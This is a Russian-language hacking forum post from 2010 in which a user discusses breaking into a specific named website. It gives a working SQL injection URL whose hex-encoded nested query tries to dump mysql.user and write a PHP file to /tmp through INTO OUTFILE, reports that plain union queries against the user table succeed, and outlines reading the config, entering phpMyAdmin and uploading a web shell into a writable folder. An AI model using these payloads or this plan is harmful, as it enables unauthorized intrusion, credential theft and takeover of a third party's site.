Показать сообщение отдельно

  #5  
Старый 15.01.2010, 21:08
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

http://adm in801.securesites.net/risk2.tar а это случаем не екап сайта?

попробывал залить через двойной запрос..
http://admin801.securesites.net/story.php?id=-19469+union+select+0x2d3120756e696f6e2073656c65637 420312c312c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c3139206 6726f6d206d7973716c2e7573657220696e746f206f7574666 96c6520272f746d702f7465737474322e70687027,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--+

Но что-то не хочет лить даже в /tmp, странно..Может что пропустил подуставший...Хотя обычный подзапрос типа union select 1,2,3..19 from mysql.user where name = 'root', работает на ура.

Второй вариант, читаешь конфиг, заходишь в phpmyadmin и заливаешь шелл ) я уже Скажу по секрету, папка с правами там есть

Последний раз редактировалось v1d0qz; 16.01.2010 в 00:11..
 
Ответить с цитированием